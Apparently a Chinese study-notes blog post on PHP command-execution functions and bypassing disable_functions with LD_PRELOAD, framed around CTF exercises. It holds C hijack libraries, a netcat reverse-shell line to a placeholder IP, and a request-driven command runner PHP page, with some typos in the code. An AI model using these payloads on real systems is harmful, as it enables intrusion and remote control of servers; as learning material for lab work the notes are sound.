<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            php命令执行
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 7.1.1"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">php命令执行</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2024-04-17
                        </span>
                        
                            
                                <span id="/article/1615743781/" class="leancloud_visitors" data-flag-title="php命令执行">
                                    <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                                </span>
                            
                            
                                <span>
                                    <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/article/1615743781/"></span>
                                </span>
                              
                        
                    </p>
                    
                    
                        
                            <span class="tag-color">学习笔记</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h1 id="PHP命令执行"><a href="#PHP命令执行" class="headerlink" title="PHP命令执行"></a>PHP命令执行</h1><h2 id="一-命令执行函数介绍"><a href="#一-命令执行函数介绍" class="headerlink" title="一.命令执行函数介绍"></a>一.命令执行函数介绍</h2><p><code>system exec passthru shell_exec 反引号 popen proc_open pcntl_exec</code></p>
<p>了解能否<strong>回显</strong>，需求的<strong>参数</strong></p>
<h3 id="system-string-command-int-return-var"><a href="#system-string-command-int-return-var" class="headerlink" title="system(string $command,int &amp;$return_var&#x3D;?)"></a>system(string $command,int &amp;$return_var&#x3D;?)</h3><p>command为执行的命令(必须)，return_var用来记录命令执行后返回的状态(可选)</p>
<p><strong>system函数有回显</strong></p>
<h3 id="exec-string-command-array-output-int-return-var"><a href="#exec-string-command-array-output-int-return-var" class="headerlink" title="exec(string $command,array &amp;$output&#x3D;?,int  &amp;$return_var&#x3D;?)"></a>exec(string $command,array &amp;$output&#x3D;?,int  &amp;$return_var&#x3D;?)</h3><p>command为执行的命令，单独使用时只有最后一行结果，且不会回显</p>
<p>output:用命令执行的输出填充此数组，每行输出一个元素，用<strong>print_r(array)或var_dump</strong>输出结果</p>
<p>var返回状态（忽略）</p>
<h3 id="passthru-string-command-int-return-var"><a href="#passthru-string-command-int-return-var" class="headerlink" title="passthru(string $command,int &amp;$return_var)"></a>passthru(string $command,int &amp;$return_var)</h3><p>command:执行的命令，var忽略</p>
<p>二进制数据（无关）</p>
<p><strong>直接回显，不需要print_r</strong></p>
<p>shell_exec(string $cmd)</p>
<p><strong>无回显，需要print_r，echo..</strong></p>
<h3 id="反引号-cmd"><a href="#反引号-cmd" class="headerlink" title="反引号\$cmd"></a>反引号<code>\$cmd</code></h3><p><strong>无回显</strong></p>
<h3 id="popen-string-command-string-mode"><a href="#popen-string-command-string-mode" class="headerlink" title="popen(string $command,string $mode)"></a>popen(string $command,string $mode)</h3><p>mode(模式):’r’表示阅读,’w’表示写入。（命令执行后会把内容放到一个临时文档）</p>
<p>这个文档需要用fgets获取内容,用print_r输出内容</p>
<p><strong>‘w’模式支持自动回显，r模式需要用print_r</strong></p>
<h3 id="proc-open-1-2-3-4-5-6-不常用"><a href="#proc-open-1-2-3-4-5-6-不常用" class="headerlink" title="proc_open(1,2,3,4,5,6)	&#x2F;&#x2F;不常用"></a>proc_open(1,2,3,4,5,6)	&#x2F;&#x2F;不常用</h3><p>1,2,3必须</p>
<p>1:command;	2:descriptor_spec 定义数组内容	3:pipes:调用数组内容</p>
<p>descriptor_spec需要预定义，$pipes[1]写入，stream_get_contents($pipes[1]);读取，需要echo</p>
<h3 id="pcntl-exec-1-2-3-后续讲解"><a href="#pcntl-exec-1-2-3-后续讲解" class="headerlink" title="pcntl_exec(1,2,3)	&#x2F;&#x2F;后续讲解"></a>pcntl_exec(1,2,3)	&#x2F;&#x2F;后续讲解</h3><p>此模块需额外安装</p>
<p>1:string $path为一个可执行二进制文件，在linux中<code>/bin/命令</code> 为二进制执行</p>
<p>2：array $args是传递给程序的参数</p>
<p>3:$envs是字符串数组，key&#x3D;&gt;value格式,key代表要传递的环境变量的名称，value代表环境变量的值</p>
<h2 id="二、替换绕过函数过滤"><a href="#二、替换绕过函数过滤" class="headerlink" title="二、替换绕过函数过滤"></a>二、替换绕过函数过滤</h2><p>过滤exec|system|popen|proc_open|`</p>
<p>用其他函数,如passthru(‘cmd’)绕过</p>
<h3 id="LD-PRELOAD绕过原理"><a href="#LD-PRELOAD绕过原理" class="headerlink" title="LD_PRELOAD绕过原理"></a>LD_PRELOAD绕过原理</h3><h4 id="1-应用场景"><a href="#1-应用场景" class="headerlink" title="1.应用场景"></a>1.应用场景</h4><p>disable_functions禁用所有可能用到的命令执行函数</p>
<h4 id="2-程序的链接"><a href="#2-程序的链接" class="headerlink" title="2.程序的链接"></a>2.程序的链接</h4><p>(1)静态链接:在程序运行之前先将各个目标模块以及所需要的库函数链接成一个完整的可执行程序，之后不再拆开。<br>(2)装入时动态链接:源程序编译后所得到的一组目标模块，在装入内存时，边装入边链接。<br>(3)运行时动态链接:原程序编译后得到的目标模块，在程序执行过程中需要用到时才对它进行链接。<br>    对于动态链接来说，需要一个动态链接库，其作用在于当动态库中的函数发生变化对于可执行程序来说时透明的，可执行程序无需重新编译，方便程序的发布&#x2F;维护&#x2F;更新。</p>
<h4 id="3-LD-PRELOAD"><a href="#3-LD-PRELOAD" class="headerlink" title="3.LD_PRELOAD"></a>3.LD_PRELOAD</h4><p>修改库文件</p>
<p>影响程序运行时的链接，加载别的动态链接可以，甚至覆盖正常的库</p>
<p>使用自己的或是更好的函数（无需别人的源码），也可以向别人的程序注入恶意程序</p>
<p>使用方法：</p>
<ol>
<li>mail 内嵌在php里</li>
<li>imagick需要扩展安装</li>
</ol>
<h5 id="1-mail"><a href="#1-mail" class="headerlink" title="1.mail"></a>1.mail</h5><p><code>vim demo.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="title function_ invoke__">mail</span>(<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>strace -o 1.txt -f php demo.php</code>把输出写到1.txt文件</p>
<p><code>cat 1.txt | grep execve</code>检查调用了那些子程序，调用了sendmail函数</p>
<p><code>readelf -Ws /usr/sbin/sendmail</code>查看调用了哪些库文件，其中geteuid库文件(获取用户uid信息)可以替换自己写的库文件</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> <span class="title function_">payload</span><span class="params">()</span>&#123;</span><br><span class="line">system(<span class="string">&quot;echo&#x27;小可爱，你邮件还能发出去么?&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">geteuid</span><span class="params">()</span>&#123;<span class="comment">//生成动作geteuid,执行payload</span></span><br><span class="line">unsetenv(<span class="string">&quot;LD PRELOAD&quot;</span>);<span class="comment">//生成动作geteuid,执行payload结束调用</span></span><br><span class="line">payload();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>粘贴到<code>vim poc.c</code>，<code>gcc -shared -fPIC demo.c -o demo.so</code>编译成.so文件，生成动态链接库文件</p>
<p>在此之前，需要修改demo,php更改库文件(esc wq保存)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="title function_ invoke__">putenv</span>(<span class="string">&quot;LD_PRELOAD=./poc.so&quot;</span>);</span><br><span class="line">    <span class="title function_ invoke__">mail</span>(<span class="string">&quot;,&quot;</span>,<span class="string">&quot;,&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这时调用<code>php demo.php</code>输出小可爱，你邮件还能发出去么?</p>
<p>原理mail-&gt;sendmail()-&gt;geteuid()</p>
<p>绕过条件：</p>
<p>1.能够上传自己的.so文件;</p>
<p>2.能够控制环境变量的值(设置LD_PRELOAD变量)，比如putenv函数并且未被禁止;</p>
<p>3.存在可以控制PHP启动外部程序的函数并能执行(因为新进程启动将加载LDPRELOAD<br>中的.so文件)，比如mail()、imap mail()、mb_send_mail()和error_log()等。</p>
<h4 id="4-例题-81端口禁用函数例题"><a href="#4-例题-81端口禁用函数例题" class="headerlink" title="4.例题-81端口禁用函数例题"></a>4.例题-81端口禁用函数例题</h4><p>ld-prlooad防炸<br><code>dpkg-reconfigure dash</code>      yes</p>
<p><code>dpkg-reconfigure bash</code>       做完了改回来</p>
<h5 id="1-上传-so和-php"><a href="#1-上传-so和-php" class="headerlink" title="1.上传.so和.php"></a>1.上传.so和.php</h5><p>使用蚁剑链接可以上传下载文件（不能直接查看根目录）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">void</span> <span class="title function_">payload</span><span class="params">()</span>&#123;</span><br><span class="line">system(<span class="string">&quot;cat /flag &gt; /tmp/flag&quot;</span>);<span class="comment">//故去flag输出到/tmp/flag(可查看的目录就行)</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">geteuid</span><span class="params">()</span>&#123;<span class="comment">//生成动作geteuid,执行payload</span></span><br><span class="line">unsetenv(<span class="string">&quot;LD PRELOAD&quot;</span>);<span class="comment">//生成动作geteuid,执行payload结束调用</span></span><br><span class="line">payload();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>粘贴到<code>vim poc.c</code>，<code>gcc -shared -fPIC demo.c -o demo.so</code>编译成.so文件，生成动态链接库文件</p>
<p>从&#x2F;root&#x2F;php找到demo.so，拷贝到windows</p>
<p>再编辑demo.php文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="title function_ invoke__">putenv</span>(<span class="string">&quot;LD_PRELOAD=./poc.so&quot;</span>);</span><br><span class="line">    <span class="title function_ invoke__">mail</span>(<span class="string">&quot;,&quot;</span>,<span class="string">&quot;,&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>一起上传到蚁剑,网页访问&#x2F;demo.php，在tmp目录找到flag</p>
<p>*为了避免重复上传文件，更改c文件的system为<code>system(&quot;nc 192.168.xxx.xxx 7777 -e /bin/bash&quot;)</code>反弹shell</p>
<p><code>nc -lvp 7777</code>监听7777端口</p>
<p>上传.so .php文件，访问demo.php，此时直接在linux终端输入命令即可</p>
<h5 id="EVIL-CMDLINE-不如nc"><a href="#EVIL-CMDLINE-不如nc" class="headerlink" title="EVIL_CMDLINE(不如nc)"></a>EVIL_CMDLINE(不如nc)</h5><p>把要执行的命令赋值到环境变量EVIL_CMDLINE直接读取命令</p>
<p>demo.c-&gt;.so</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">geteuid</span><span class="params">()</span>&#123;</span><br><span class="line"><span class="type">const</span> <span class="type">char</span>* cmdline = getenv(<span class="string">&quot;EVIL CMDLINE&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(getenv(<span class="string">&quot;LD PRELOAD&quot;</span>)== <span class="literal">NULL</span>)&#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line">unsetenV(<span class="string">&quot;LD PRELOAD&quot;</span>);</span><br><span class="line">system(cmdline);<span class="comment">//放入system执行</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>demo.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$cmd</span> =<span class="variable">$_REQUEST</span>[<span class="string">&quot;cmd&quot;</span>];<span class="comment">//要执行的命令</span></span><br><span class="line"><span class="variable">$out_path</span>=<span class="variable">$_REQUEST</span>[<span class="string">&quot;outpath&quot;</span>];<span class="comment">//outpath命令执行结果输出到指定路径下的文件</span></span><br><span class="line"><span class="variable">$qvil_cmdline</span> = <span class="variable">$cmd</span>.<span class="string">&quot;&gt;&quot;</span>.<span class="variable">$out</span> path.<span class="string">&quot; 2&gt;&amp;1&quot;</span><span class="comment">//2&gt;&amp;1将标准错误重定向到标准输出</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br /&gt;&lt;b&gt;cmdline: &lt;/b&gt;&quot;</span>.<span class="variable">$evil</span> cmdline;<span class="comment">//打印显示实际在linux上执行的命令</span></span><br><span class="line"><span class="title function_ invoke__">putenv</span>(<span class="string">&quot;EVIL CMDLINE=&quot;</span>.<span class="variable">$evil</span> cmdline);<span class="comment">//putenv改变环境变量的值</span></span><br><span class="line"><span class="variable">$so_path</span> =$ _REQUEST[<span class="string">&quot;sopath&quot;</span>];<span class="comment">//定义动态链接库</span></span><br><span class="line"><span class="title function_ invoke__">putenv</span>(<span class="string">&quot;LD PRELOAD=&quot;</span>.<span class="variable">$so_path</span>);</span><br><span class="line"><span class="title function_ invoke__">mail</span>(<span class="string">&quot;,&quot;</span>,<span class="string">&quot;,&quot;</span>)</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;br /&gt;&lt;b&gt;output: &lt;/b&gt;&lt;br /&gt;&quot;</span>.<span class="title function_ invoke__">nl2br</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$out_path</span>));<span class="comment">//调用输出环境变量的命令</span></span><br></pre></td></tr></table></figure>

<p>上传.so,.php</p>
<p>访问url&#x2F;demo.php?cmd&#x3D;ls&amp;outpath&#x3D;&#x2F;tmp&#x2F;benben&amp;sopath&#x3D;.&#x2F;demo.so</p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/RL02.jpg" alt="Dyinglight">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>Dyinglight
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/article/1615743781/" target="_blank">php命令执行</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>原神,启动！
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tag/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                    
                        <a href="/article/3439035480/" class="next-prefix">» </a> 下一篇：    <a href="/article/3439035480/" title="发布于 2024-04-14 03:20">4.14文件上传刷题日记</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>
    
 
        </div>
    
</div>
    <div id="footer">
    <div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 WorstOne. All Rights Reserved.</div>
</div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>ctf start！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/RL02.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user">
                        
                            <a href="https://worstone.cn" target="_blank"><span>Dyinglight</span></a>
                        
                    </div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://zhihu.com/people/worstone-29" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://weibo.com/u/5749847477" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.jpg"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data=""><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/Dyinglight5" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>
    
    <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
    <script type="text/javascript" src="/js/APlayer.min.js"></script>
    <script type="text/javascript" src="/js/Meting.min.js"></script>
    <script>
        var meting_api = 'https://api.i-meto.com/meting/api?server=:server&type=:type&id=:id&auth=:auth&r=:r';
    </script>
    <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>

    <div class="wrap-right">
    <div class="wrap-right-hide">
         <div class="wrap-right-button favorites">
            <div class="iconbox" switch="false">
                <span class="iconfont icon-favorites"></span>
            </div>
            <span class="icontext">关注</span>
         </div>
        <div class="wrap-right-button search">
            <div class="iconbox">
                <span class="iconfont icon-search-menu"></span>
            </div>
            <span class="icontext">搜索</span>
        </div>
        <div class="wrap-right-button menu-button">
            <div class="iconbox">
                <span class="iconfont icon-menu"></span>
            </div>
            <span class="icontext">菜单</span>
        </div>
        <div class="wrap-right-button mode">
            <div class="light">
                <div class="iconbox">
                    <span class="iconfont icon-daymode"></span>
                </div>
                <span class="icontext">浅色模式</span>
            </div>
            <div class="dark">
                <div class="iconbox">
                    <span class="iconfont icon-nightmode-fill"></span>
                </div>
                <span class="icontext">深色模式</span>
            </div>
        </div>
        <div class="wrap-right-button bottom">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">跳至底部</span>
        </div>
    </div>
    <div class="wrap-right-show">
        <div class="wrap-right-button set">
            <div class="iconbox">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="wrap-right-button top">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
</div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "Dyinglight5",
        GitHubRepositories : "Dyinglight5.github.io",

        User             : "Dyinglight",
        UserAvatar       : "/image/sidebar/RL02.jpg",
        WebsiteStartDate : "2024-03-24",
        Home             : "https://worstone.cn",

        WebsiteTitleBlur         : "(◍´꒳`◍) Hi, Live For Code",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "(*´∇｀*) 欢迎回来!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : {
            light : "/image/website/logo/logo.png",
            dark  : "/image/website/logo/logo-dark.png"
        },

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/elysia2.jpg",
            
                "/image/header/kiana1.png",
            
                "/image/header/home.jpeg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
                "/image/header/home.jpeg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "ctf start！",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archive",
                    type   : "archive",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "订阅",
                    icon   : "icon-rss",
                    href   : "/atom.xml",
                    type   : "",
                    class  : "",
                    target : "_blank"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "知乎",
                        icon   : "icon-zhihu",
                        href   : "https://zhihu.com/people/worstone-29",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "微博",
                        icon   : "icon-weibo",
                        href   : "https://weibo.com/u/5749847477",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
                    {
                        name   : "QQ",
                        icon   : "icon-qq",
                        href   : "javascript:;",
                        class  : "image",
                        target : "_self",
                        image  : "/image/sidebar/qq.jpg"
                    },
                
                    {
                        name   : "微信",
                        icon   : "icon-wechat",
                        href   : "javascript:;",
                        class  : "",
                        target : "_self",
                        image  : ""
                    },
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/Dyinglight5",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.jpg",
            wechat  : "/image/donate/wechatpay.jpg"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
